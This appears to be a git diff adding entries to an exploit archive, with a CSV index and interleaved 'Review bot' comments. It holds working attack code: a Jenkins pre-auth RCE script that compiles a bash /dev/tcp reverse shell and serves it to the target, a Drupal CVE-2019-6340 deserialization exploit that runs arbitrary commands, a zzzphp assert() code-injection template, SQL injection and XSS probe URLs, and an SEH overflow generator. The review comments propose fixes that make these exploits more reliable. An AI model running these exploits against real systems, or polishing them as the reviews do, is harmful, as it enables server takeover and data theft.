diff --git a/exploits/java/webapps/46453.py b/exploits/java/webapps/46453.py new file mode 100755 index 000000000..661500c97 --- /dev/null +++ b/exploits/java/webapps/46453.py 
@@ -0,0 +1,153 @@ +#!/usr/bin/env python +# +# Exploit Title : jenkins-preauth-rce-exploit.py +# Date : 02/23/2019 +# Authors : wetw0rk & 0xtavian +# Vendor Homepage : https://jenkins.oi +# Software Link : https://jenkins.io/download/ +# Tested on : jenkins=v2.73 Plugins: Script Security=v1.49, Pipeline: Declarative=v1.3.4, Pipeline: Groovy=v2.60, +# +# Greetz: Hima, Fr13ndzSec, AbeSnowman, Berserk, Neil +# +# Description : This exploit chains CVE-2019-1003000 and CVE-2018-1999002 for Pre-Auth Remote Code Execution in Jenkins +# Security Advisory : https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266 +# +# Vulnerable Plugins - +# Pipeline: Declarative Plugin up to and including 1.3.4 +# Pipeline: Groovy Plugin up to and including 2.61 +# Script Security Plugin up to and including 1.49 +# +# +# Credit Goes To @orange_8361 & adamyordan +# +# http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html +# http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html +# https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc + +import os +import sys +import requests +import random +import SimpleHTTPServer +import SocketServer +import multiprocessing + +class exploit_ya_bish(): + + def __init__(self, rhost, rport, lhost, lport): + self.rhost = rhost + self.rport = rport + self.lhost = lhost + self.lport = lport + self.pname = "" + + # evil_server: server to host the payload + def evil_server(self): + handler = SimpleHTTPServer.SimpleHTTPRequestHandler + httpd = SocketServer.TCPServer((self.lhost, 80), handler) + httpd.serve_forever() + return + + # gen_payload: generate payload and start web server + def gen_payload(self): + self.pname = ''.join( + [ + random.choice( + "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + "abcdefghijklmnopqrstuvwxyz" + ) for i in range(random.randint(1, 25)) + ] + ) + + home = os.getcwd() + os.makedirs("www/package/%s/1/" % self.pname) + os.chdir("www/package/%s/1/" % self.pname) + + pfile = 
'public class %s {\n' % self.pname + pfile += ' public %s() {\n' % self.pname + pfile += ' try {\n' + pfile += ' String payload = "bash -i >& /dev/tcp/{:s}/{:s} 0>&1";\n'.format(self.lhost, self.lport) + pfile += ' String[] cmds = { "/bin/bash", "-c", payload };\n' + pfile += ' java.lang.Runtime.getRuntime().exec(cmds);\n' + pfile += ' } catch (Exception e) {\n' + pfile += ' }\n' + pfile += ' }\n' + pfile += '}\n' + + print "{1} generating payload" + fd = open('{:s}.java'.format(self.pname), 'w') + fd.write(pfile) + fd.close() + + os.makedirs("META-INF/services/") + os.system("echo %s > META-INF/services/org.codehaus.groovy.plugins.Runners" % self.pname) + os.system("javac -Xlint:-options -source 6 -target 1.6 %s.java" % self.pname) + os.system("jar cf %s-1.jar ." % self.pname) + + print "{2} starting evil payload server" + os.chdir("%s/www" % home) + jobs = [] + for i in range(1): + p = multiprocessing.Process(target=self.evil_server) + jobs.append(p) + p.start() + + os.chdir(home) + + return + + def exploit(self): + self.gen_payload() + + cookies = \ + { + 'JSESSIONID.wetw0rk!': 'XXXXXXXXXXXXXXXXXXXXXXXX', + } + + headers = \ + { + 'Host': '{:s}:{:s}'.format(self.rhost, self.rport), + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + print "{3} as easy as 1,2,3 triggering now" + response = requests.get( + ( + 'http://{:s}:{:s}/securityRealm/user/admin/descriptorByName/' + 'org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=' + '@GrabConfig(disableChecksums=true)%0a' + '@GrabResolver(name=%27{:s}%27,%20root=%27http://{:s}%27)%0a' + '@Grab(group=%27package%27,%20module=%27{:s}%27,%20version=%271%27)%0aimport%20Payload;'.format( + self.rhost, self.rport, + self.pname, + self.lhost, + self.pname + ) + ), + headers=headers, + cookies=cookies, + verify=False + ) + + return 
+
+def main():
+ try:
+ rhost = sys.argv[1]
+ rport = sys.argv[2]
+ lhost = sys.argv[3]
+ lport = sys.argv[4]
+ except:
+ print "Usage: ./%s " % sys.argv[0]
+ print "MAKE SURE U GOT A LISTENER HOMIE!!"
+ exit(-1)
+
+ start = exploit_ya_bish(rhost,rport,lhost,lport)
+ start.exploit()
+ os.system("rm -r www")
+
+main()
\ No newline at end of file
diff --git a/exploits/php/webapps/46454.txt b/exploits/php/webapps/46454.txt
new file mode 100644
index 000000000..16936e69f
--- /dev/null
+++ b/exploits/php/webapps/46454.txt
@@ -0,0 +1,30 @@
+# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1
+
+# Google Dork: intext:"2015-2019 zzcms.com"
+
+# Date: 24/02/2019
+
+# Exploit Author: Yang Chenglong
+
+# Vendor Homepage: http://www.zzzcms.com/index.html
+
+# Software Link: http://115.29.55.18/zzzphp.zip
+
+# Version: 1.6.1
+
+# Tested on: windows/Linux,iis/apache
+
+# CVE : CVE-2019-9041
+
+Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation.
+
+Exploit:
+login in to the admin panel, edit the template of search.html, insert the following code:
+
+{if:assert($_POST[x])}phpinfo();{end if}
+
+Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow:
+[1.png]
+
+Remarks:
+While the above exploit requires attackers to have the access to the admin panel, I will post another exploit by using csrf to acquire the control of website without access to the admin panel.
\ No newline at end of file
diff --git a/exploits/php/webapps/46455.txt b/exploits/php/webapps/46455.txt
new file mode 100644
index 000000000..2f36170da
--- /dev/null
+++ b/exploits/php/webapps/46455.txt
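Review bot: The payload web server is never shut down: `evil_server` runs `serve_forever()` in a non-daemon `multiprocessing.Process`, so after `os.system("rm -r www")` at the end of `main` the interpreter blocks joining that child and the script never exits, and because `TCPServer` is created without `allow_reuse_address` a second run cannot bind port 80 while the first lingers. Set `p.daemon = True` before `p.start()` in `gen_payload` and `httpd.allow_reuse_address = True` in `evil_server`, and give the `requests.get` in `exploit` a `timeout=` so a stalled @Grab resolution on the target does not hang the client indefinitely. The usage line in `main`, `print "Usage: ./%s " % sys.argv[0]`, appears to have lost its placeholders for the four positional arguments it reads (rhost rport lhost lport) — presumably stripped as angle-bracket markup during extraction — and should name them.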
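Review bot: The PoC depends on `assert($_POST[x])` evaluating a string argument, which PHP 7 still does but PHP 8.0 removed, so the header should record the PHP version it was tested on next to `Tested on: windows/Linux,iis/apache`. The description names `parserIfLabel()` in `inc/zzz_template.php` but does not say what the missing filter is or what the `{if:...}` expression is passed to, so a reader cannot confirm the sink without the screenshot; one sentence on that would make the entry reproducible. The dork `intext:"2015-2019 zzcms.com"` names zzcms rather than zzzcms/zzzphp — presumably a typo, worth confirming against the actual footer string.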
@@ -0,0 +1,21 @@
+# Exploit Title: PHP Ecommerce Script 2.0.6 - Cross Site Scripting / SQL Injection
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan[@]gmail[.]com
+# Discovery Date: February 22, 2019
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link : https://www.phpscriptsmall.com/product/php-ecommerce-script/
+# Tested Version: 2.0.6
+# Tested on: Kali linux, Windows 8.1
+
+
+# PoC:
+
+# Cross Site Scripting:
+
+# http://localhost/[PATH]/?s=[XSS]
+# http://localhost/[PATH]/?s=
+
+# SQL Injection:
+
+# http://localhost/[PATH]/?s=[SQL]
+# http://localhost/[PATH]/?s=1%20and%20extractvalue(rand(),concat(0x7e,version()))
\ No newline at end of file
diff --git a/exploits/php/webapps/46456.txt b/exploits/php/webapps/46456.txt
new file mode 100644
index 000000000..d8064a1df
--- /dev/null
+++ b/exploits/php/webapps/46456.txt
@@ -0,0 +1,15 @@
+# Exploit Title: News Website Script 2.0.5 - SQL Injection
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan[@]gmail[.]com
+# Discovery Date: February 22, 2019
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link : https://www.phpscriptsmall.com/product/news-website-script/
+# Tested Version: 2.0.5
+# Tested on: Kali linux, Windows 8.1
+
+
+# PoC:
+
+# http://localhost/[PATH]/index.php/show/news/11 [SQL]/
+
+# http://localhost/[PATH]/index.php/show/news/11%20and%201=0/Sports/january-25-2018/Pogba-still-has-to-improve-Allegri
\ No newline at end of file
diff --git a/exploits/php/webapps/46457.txt b/exploits/php/webapps/46457.txt
new file mode 100644
index 000000000..e1de802f7
--- /dev/null
+++ b/exploits/php/webapps/46457.txt
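Review bot: The second XSS PoC line, `# http://localhost/[PATH]/?s=`, carries no payload, so as published the cross-site scripting half is not reproducible; presumably the original tag-based payload was stripped as markup, and it should be restored in URL-encoded form (e.g. `%3Cscript%3Ealert(1)%3C%2Fscript%3E`) so it survives rendering. The SQL injection PoC is error-based via `extractvalue()`, which only yields output when MySQL errors reach the page and truncates the XPath error text to roughly 32 characters, so a boolean- or time-based confirmation would be worth adding for installs with errors suppressed. The entry also never names the vulnerable file, so readers cannot tell which script consumes `s`.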
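Review bot: The News Website Script PoC shows only the false condition `11%20and%201=0`, so a changed page is indistinguishable from the path segment simply not matching a record; pair it with the true-condition request `11%20and%201=1` and state that the two responses differ, which is the minimum evidence for boolean-based injection in a path segment. The placeholder form `show/news/11 [SQL]/` also drops the trailing slug segments that the concrete URL keeps (`/Sports/january-25-2018/...`), so it is unclear whether the route resolves without them.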
@@ -0,0 +1,14 @@
+# Exploit Title: Advance Gift Shop Pro Script 2.0.3 - SQL Injection
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan[@]gmail[.]com
+# Discovery Date: February 21, 2019
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link : https://www.phpscriptsmall.com/product/gifts-shop/
+# Tested Version: 2.0.3
+# Tested on: Kali linux, Windows 8.1
+
+
+# PoC:
+
+# http://localhost/[PATH]/?category=&s=[SQL]&search_posttype=product
+# http://localhost/[PATH]/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product
\ No newline at end of file
diff --git a/exploits/php/webapps/46459.py b/exploits/php/webapps/46459.py
new file mode 100755
index 000000000..c36805c81
--- /dev/null
+++ b/exploits/php/webapps/46459.py
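Review bot: This is the third phpscriptsmall product in this batch (alongside 46455 here and 46426 in the CSV) reporting the same injectable `s` search parameter with the same `extractvalue()` probe, which suggests one shared search handler across the vendor's products rather than three independent flaws; naming the vulnerable file would let that be confirmed and the entries cross-referenced. As with the sibling PoC, `extractvalue(rand(),concat(0x7e,version()))` depends on MySQL error output reaching the page and truncates the result to about 32 characters, so a line on what a successful response looks like (the `~` prefix followed by the version string) would help verification.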
@@ -0,0 +1,224 @@ +#!/usr/bin/env python3 + +# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC +# 2019 @leonjza + +# Technical details for this exploit is available at: +# https://www.drupal.org/sa-core-2019-003 +# https://www.ambionics.io/blog/drupal8-rce +# https://twitter.com/jcran/status/1099206271901798400 + +# Sample usage: +# +# $ python cve-2019-6340.py http://127.0.0.1/ "ps auxf" +# CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC +# by @leonjza +# +# References: +# https://www.drupal.org/sa-core-2019-003 +# https://www.ambionics.io/blog/drupal8-rce +# +# [warning] Caching heavily affects reliability of this exploit. +# Nodes are used as they are discovered, but once they are done, +# you will have to wait for cache expiry. +# +# Targeting http://127.0.0.1/... +# [+] Finding a usable node id... +# [x] Node enum found a cached article at: 2, skipping +# [x] Node enum found a cached article at: 3, skipping +# [+] Using node_id 4 +# [+] Target appears to be vulnerable! +# +# USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +# root 49 0.0 0.0 4288 716 pts/0 Ss+ 16:38 0:00 sh +# root 1 0.0 1.4 390040 30540 ? Ss 15:20 0:00 apache2 -DFOREGROUND +# www-data 24 0.1 2.8 395652 57912 ? S 15:20 0:08 apache2 -DFOREGROUND +# www-data 27 0.1 2.9 396152 61108 ? S 15:20 0:08 apache2 -DFOREGROUND +# www-data 31 0.0 3.4 406304 70408 ? S 15:22 0:04 apache2 -DFOREGROUND +# www-data 39 0.0 2.7 398472 56852 ? S 16:14 0:02 apache2 -DFOREGROUND +# www-data 44 0.2 3.2 402208 66080 ? S 16:37 0:05 apache2 -DFOREGROUND +# www-data 56 0.0 2.6 397988 55060 ? S 16:38 0:01 apache2 -DFOREGROUND +# www-data 65 0.0 2.3 394252 48460 ? S 16:40 0:01 apache2 -DFOREGROUND +# www-data 78 0.0 2.5 400996 51320 ? S 16:47 0:01 apache2 -DFOREGROUND +# www-data 117 0.0 0.0 4288 712 ? 
S 17:20 0:00 \_ sh -c echo + +import sys +from urllib.parse import urlparse, urljoin + +import requests + + +def build_url(*args) -> str: + """ + Builds a URL + """ + + f = '' + for x in args: + f = urljoin(f, x) + + return f + + +def uri_valid(x: str) -> bool: + """ + https://stackoverflow.com/a/38020041 + """ + + result = urlparse(x) + return all([result.scheme, result.netloc, result.path]) + + +def check_drupal_cache(r: requests.Response) -> bool: + """ + Check if a response had the cache header. + """ + + if 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT': + return True + + return False + + +def find_article(base: str, f: int = 1, l: int = 100): + """ + Find a target article that does not 404 and is not cached + """ + + while f < l: + u = build_url(base, '/node/', str(f)) + r = requests.get(u) + + if check_drupal_cache(r): + print(f'[x] Node enum found a cached article at: {f}, skipping') + f += 1 + continue + + # found an article? + if r.status_code == 200: + return f + f += 1 + + +def check(base: str, node_id: int) -> bool: + """ + Check if the target is vulnerable. 
+ """ + + payload = { + "_links": { + "type": { + "href": f"{urljoin(base, '/rest/type/node/INVALID_VALUE')}" + } + }, + "type": { + "target_id": "article" + }, + "title": { + "value": "My Article" + }, + "body": { + "value": "" + } + } + + u = build_url(base, '/node/', str(node_id)) + r = requests.get(f'{u}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) + + if check_drupal_cache(r): + print(f'Checking if node {node_id} is vuln returned cache HIT, ignoring') + return False + + if 'INVALID_VALUE does not correspond to an entity on this site' in r.text: + return True + + return False + + +def exploit(base: str, node_id: int, cmd: str): + """ + Exploit using the Guzzle Gadgets + """ + + # pad a easy search replace output: + cmd = 'echo ---- & ' + cmd + payload = { + "link": [ + { + "value": "link", + "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000" + "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"" + "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:" + "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";" + "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000" + "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000" + "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"" + "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" + "".replace('|size|', str(len(cmd))).replace('|command|', cmd) + } + ], + "_links": { + "type": { + "href": f"{urljoin(base, '/rest/type/shortcut/default')}" + } + } + } + + u = build_url(base, '/node/', str(node_id)) + r = requests.get(f'{u}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"}) + + if check_drupal_cache(r): + print(f'Exploiting {node_id} returned cache HIT, may have failed') + + if '----' not in r.text: + print('[warn] Command execution _may_ have failed') + + print(r.text.split('----')[1]) + + +def main(base: str, cmd: str): + """ + Execute an OS command! 
+ """ + + print('[+] Finding a usable node id...') + article = find_article(base) + if not article: + print('[!] Unable to find a node ID to reference. Check manually?') + return + + print(f'[+] Using node_id {article}') + + vuln = check(base, article) + if not vuln: + print('[!] Target does not appear to be vulnerable.') + print('[!] It may also simply be a caching issue, so maybe just try again later.') + return + print(f'[+] Target appears to be vulnerable!') + + exploit(base, article, cmd) + + +if __name__ == '__main__': + + print('CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC') + print(' by @leonjza\n') + print('References:\n' + ' https://www.drupal.org/sa-core-2019-003\n' + ' https://www.ambionics.io/blog/drupal8-rce\n') + print('[warning] Caching heavily affects reliability of this exploit.\n' + 'Nodes are used as they are discovered, but once they are done,\n' + 'you will have to wait for cache expiry.\n') + + if len(sys.argv) <= 2: + print(f'Usage: {sys.argv[0]} ') + print(f' Example: {sys.argv[0]} http://127.0.0.1/ id') + + target = sys.argv[1] + command = sys.argv[2] + if not uri_valid(target): + print(f'Target {target} is not a valid URL') + sys.exit(1) + + print(f'Targeting {target}...') + main(target, command) \ No newline at end of file diff --git a/exploits/windows/dos/46458.py b/exploits/windows/dos/46458.py new file mode 100755 index 000000000..74a2232e0 --- /dev/null +++ b/exploits/windows/dos/46458.py 
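Review bot: In the `__main__` block, `if len(sys.argv) <= 2:` prints the usage but does not exit, so running with no arguments falls through to `target = sys.argv[1]` and dies with an IndexError instead of the usage message; add `sys.exit(1)` inside that branch. In `exploit`, the `'----' not in r.text` check only prints a warning and the very next statement, `r.text.split('----')[1]`, raises IndexError on exactly that path — return after the warning, or print `r.text` in full so the response is at least visible. Neither `requests.get` call passes a `timeout=`, which matters for a PoC whose reliability already hinges on cache state as the header warns. The usage line `print(f'Usage: {sys.argv[0]} ')` appears to have lost its url/command placeholders, presumably stripped as angle-bracket markup during extraction.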
@@ -0,0 +1,33 @@
+# Exploit Title: Xlight 3.9.1 FTP Server SEH Overwrite
+# Google Dork: N/A
+# Date: 2019-02-24
+# Exploit Author: Logan Whitmire
+# Vendor Homepage: https://www.xlightftpd.com/index.htm
+# Software Link: https://www.xlightftpd.com/download/xlight.zip
+# Version: 3.9.1
+# Tested on: Windows XP
+# CVE : N/A
+
+
+POC:#!/usr/bin/python
+#Vulnerable Software: Xlight FTP Server 3.9.1
+#Link: https://www.xlightftpd.com/download.htm
+#Date: 2019-02-24
+#Twitter: thermal_tp
+#inspired by bzyo's exploit
+# 1. Generate overflow.txt, open, and copy contents to clipboard
+# 2. Virtual Server
+# 3. Modify Virtual Server Configuration
+# 4. Advanced
+# 5. Misc
+# 6. Execute a program after user logged in
+# 7. Setup
+# 8. Paste crash.txt contents
+# 9. Application crashes
+# 10. SEH is overwritten
+
+buffer="A"*428
+file="overflow.txt"
+generate=open(file, "w")
+generate.write(buffer)
+generate.close
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e9793d7f2..04a0230db 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
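Review bot: `generate.close` on the last line names the method without calling it, so the file is only flushed when the interpreter exits; write `generate.close()` or, better, `with open(file, "w") as f: f.write(buffer)`. The reproduction steps are also inconsistent — step 1 generates `overflow.txt` while step 8 pastes `crash.txt` — and the header calls this an FTP server SEH overwrite while the trigger is a local paste into the GUI's virtual-server configuration, so the header should state explicitly that this is a local, post-configuration-access crash as the CSV's `Buffer Overflow (PoC)` under `dos/windows` implies. The stray `POC:` glued onto the `#!/usr/bin/python` shebang will prevent the file from running as a script and looks like a copy-paste artefact.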
@@ -6335,6 +6335,7 @@ id,file,description,date,author,type,platform,port
 46443,exploits/android/dos/46443.py,"ScreenStream 3.0.15 - Denial of Service",2019-02-21,s4vitar,dos,android,
 46445,exploits/android/dos/46445.c,"AirDrop 2.0 - Denial of Service (DoS)",2019-02-21,s4vitar,dos,android,
 46448,exploits/multiple/dos/46448.js,"WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter",2019-02-22,"Google Security Research",dos,multiple,
+46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40900,9 +40901,15 @@ id,file,description,date,author,type,platform,port
 46424,exploits/php/webapps/46424.html,"XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,php,80
 46425,exploits/jsp/webapps/46425.html,"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting",2019-02-19,"Rafael Pedrero",webapps,jsp,
 46426,exploits/php/webapps/46426.txt,"Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection",2019-02-19,"Mr Winst0n",webapps,php,80
-46427,exploits/java/webapps/46427.txt,"Jenkins - Remote Code Execution",2019-02-19,orange,webapps,java,
+46427,exploits/java/webapps/46427.txt,"Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC)",2019-02-19,orange,webapps,java,
 46429,exploits/php/webapps/46429.txt,"HotelDruid 2.3 - Cross-Site Scripting",2019-02-20,"Mehmet EMIROGLU",webapps,php,80
 46446,exploits/multiple/webapps/46446.txt,"Quest NetVault Backup Server < 11.4.5 - Process Manager Service SQL Injection / Remote Code Execution",2019-02-22,"Chris Anastasio",webapps,multiple,
 46450,exploits/linux/webapps/46450.txt,"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation",2019-02-22,SecureAuth,webapps,linux,
 46451,exploits/hardware/webapps/46451.txt,"Teracue ENC-400 - Command Injection / Missing Authentication",2019-02-22,"Stephen Shkardoon",webapps,hardware,
 46452,exploits/php/webapps/46452.txt,"Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution",2019-02-23,"Charles Fol",webapps,php,80
+46453,exploits/java/webapps/46453.py,"Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution",2019-02-25,wetw0rk,webapps,java,
+46454,exploits/php/webapps/46454.txt,"zzzphp CMS 1.6.1 - Remote Code Execution",2019-02-25,"Yang Chenglong",webapps,php,
+46455,exploits/php/webapps/46455.txt,"PHP Ecommerce Script 2.0.6 - Cross-Site Scripting / SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,
+46456,exploits/php/webapps/46456.txt,"News Website Script 2.0.5 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,
+46457,exploits/php/webapps/46457.txt,"Advance Gift Shop Pro Script 2.0.3 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,
+46459,exploits/php/webapps/46459.py,"Drupal < 8.6.9 - REST Module Remote Code Execution",2019-02-25,leonjza,webapps,php,
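Review bot: The new 46459 row is titled `Drupal < 8.6.9 - REST Module Remote Code Execution`, but the script's own header says `Drupal <= 8.6.9` and the sibling row 46452 for the same advisory reads `< 8.6.10 / < 8.5.11`; `< 8.6.9` excludes the last vulnerable release, so it should be `<= 8.6.9` or match 46452's range. The port column is also applied inconsistently within this batch: 46426 (same author and vendor as the new rows) records `80` while 46455/46456/46457 leave it empty, and 46459 leaves it empty where 46452 for the same Drupal bug has `80`. The 46454 row describes zzzphp as `Remote Code Execution` without noting that the file itself says admin-panel access is required; a `(Authenticated)` qualifier would match how other entries in this catalog are labelled.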